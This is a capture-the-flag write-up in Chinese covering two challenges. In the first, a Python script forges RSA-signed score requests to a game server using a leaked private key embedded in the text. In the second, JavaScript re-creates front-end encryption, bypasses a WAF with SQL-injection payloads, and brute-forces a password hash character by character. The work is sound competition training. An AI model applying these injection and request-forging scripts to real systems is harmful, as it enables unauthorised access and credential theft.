gameapp
这题首先反编译 apk, 简单看了看代码, 主要是有 startgame 和 score 两个 API, 然后用模拟器 (手机登不上) 安装 apk 抓了下包, 数据经过了 rsa 加密, 所以首先用 python 实现 rsa(在网上搜索私钥可以发现已经使用过, 所以直接将别人的脚本改了改来用). 题目要求获取 99999, 但一次最多获取 100 分, 所以发送 999 次 100 分, 在发送一次 99 分即可.
- import cPickle,M2Crypto,os,urllib,requests
- BaseUrl="http://121.40.219.183:9999/"
- sign_pri='''
- -----BEGIN RSA PRIVATE KEY-----
- MIICXgIBAAKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMYImonQdMC1Y8USwIwf7Y0GcBP
- /h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8aYFoms223okyzeTlUIRHbIkto
- 1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHEA3Hau/DTzW4g4xhvzQIDAQAB
- AoGAVHWs7rAnT28ZHtPUCNzqulXrlnBIhx3JMejJfqfR8H7vff2TqcA4FEEr2QNx
- U0Pj0tzqS9KrO1EpQ7FwXtheoAmf3tQb5BDxPxcph2820qa/AcIxHpf5LqfONs9d
- UrozcR23s561yjX7w5akeRzOwrq2BKwVtF/EoXvJTQKlwV0CQQDY96T70hxUOLoJ
- FrLelwl/4Heb0Lrz83lMB6UXknUbJgOiZr/KD9NzEM477MqzKD2rTM4TeULX6cNd
- hXm35daXAkEAyWtkRrStowoiscynG1KfaT4ksbbHWr53iqAhv7Z3SAshn3k9TURk
- kLCQhyIcXXnuEEGFlK84WxQSy2Q6uLI9OwJBAMpLdE+7IuDAF2z79gCmUJwjfUIR
- hw6H95OVGS/2RSvv8LmOFcpfoSaLB89Fw+TxYzaBoS71BAbulVJwbgGx0bcCQQCs
- rJxy4UJam73Sn5hDHDn9h4D9uax+ZvskpNNJ/6uS37gbd1zOeOud/0BoGR4oJPeq
- iAF0ziKKMlNKesq8vFExAkEAsvLbn5avP/CEkXZB4sRDV/gD3mK+IY5p+ZlBSYAe
- KhVKdUXkdJwNqBn+iJMwFhMC7xHIbijLRe3hL9ZB0vt1nQ==
- -----END RSA PRIVATE KEY-----
- '''
- def private_encrypt(data):
- rsa_pri = M2Crypto.RSA.load_key_string(sign_pri)
- ctxt_pri = rsa_pri.private_encrypt(data, M2Crypto.RSA.pkcs1_padding)
- ctxt64_pri = ctxt_pri.encode('base64')
- return ctxt64_pri
- def public_decrypt(msg):
- sign_pub='''
- -----BEGIN PUBLIC KEY-----
- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMY
- ImonQdMC1Y8USwIwf7Y0GcBP/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8a
- YFoms223okyzeTlUIRHbIkto1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHE
- A3Hau/DTzW4g4xhvzQIDAQAB
- -----END PUBLIC KEY-----
- '''
- bio = M2Crypto.BIO.MemoryBuffer(sign_pub)
- rsa_pub = M2Crypto.RSA.load_pub_key_bio(bio)
- ctxt_pri = msg.decode("base64")
- output = rsa_pub.public_decrypt(ctxt_pri, M2Crypto.RSA.pkcs1_padding)
- return output
- data1 = '{"player":"user"}'
- a = requests.Session()
- a.post(url=BaseUrl+"startgame/",data=private_encrypt(data1),headers={'Content-Type':'xxx'})
- for i in range(999):
- r=a.post(url=BaseUrl+"score/",data=private_encrypt("""{"score":100,"op":"add"}"""),headers={'Content-Type':'xxx'})
- print r.text
- r=a.post(url=BaseUrl+"score/",data=private_encrypt("""{"score":99,"op":"add"}"""),headers={'Content-Type':'xxx'})
- print r.text
- r=a.get(url=BaseUrl,headers={'Content-Type':'xxx'})
- print r
- print a
- Inject4Fun
这题需要说的其实不多, 总结就两点
1. 实现前端加密
- var password = "admin";
- var username = "admin";
- var a = '1234567890abcdef';
- var key = CryptoJS.enc.Latin1.parse(a);
- var iv = CryptoJS.enc.Latin1.parse('1234567890123456');
- var data1 = username;
- var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
- var data2 = password;
- var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
- var rsa = new RSAKey();
- var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B";
- var exponent = "010001";
- rsa.setPublic(modulus, exponent);
- var res = rsa.encrypt(a);
- var xhr = new XMLHttpRequest();
- xhr.open("POST","http://129.204.73.141:2000/login.php",false);
- xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
- xhr.send("username="+encrypted1+"&password="+encrypted2+"&code="+res);
- xhr.response
2. 绕过 waf
这里直接给出 payload
- var username = "admin'=(left(right(password,1),1)>'a')='1"; // 返回 wrong password
- var username = "admin'=(left(right(password,1),1)<'a')='1"; // 返回 wrong user
- exp
不知道为什么, 这题的 waf 有毒, 可能随机性触发, 可以通过修改随机生成的 16 位 key 来解决着这个问题
因为 waf 有毒的问题, 没法一次性跑出 32 位 hash, 需要多次修改 a 来获取完整 hash
- var pass='';
- var s='1234567890abcdef';
- for(var n=1;n<33;n++)
- {
- for(var i in s)
- {
- var password = "admin";
- var username = "admin'=(left(right(password,"+n+"),1)='"+s[i]+"')='1";
- var a = '1234567890abceef';
- var key = CryptoJS.enc.Latin1.parse(a);
- var iv = CryptoJS.enc.Latin1.parse('1234567890123456');
- var data1 = username;
- var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
- var data2 = password;
- var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
- var rsa = new RSAKey();
- var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B";
- var exponent = "010001";
- rsa.setPublic(modulus, exponent);
- var res = rsa.encrypt(a);
- var xhr = new XMLHttpRequest();
- xhr.open("POST","http://129.204.73.141:2000/login.php",false);
- xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
- setTimeout(xhr.send("username="+encrypted1+"&password="+encrypted2+"&code="+res),1000);
- if(xhr.response.search('wrong password')!=-1)
- {pass+=s[i];console.log(s[i]+' '+n);break;}
- }
- }
来源: http://www.bubuko.com/infodetail-3222370.html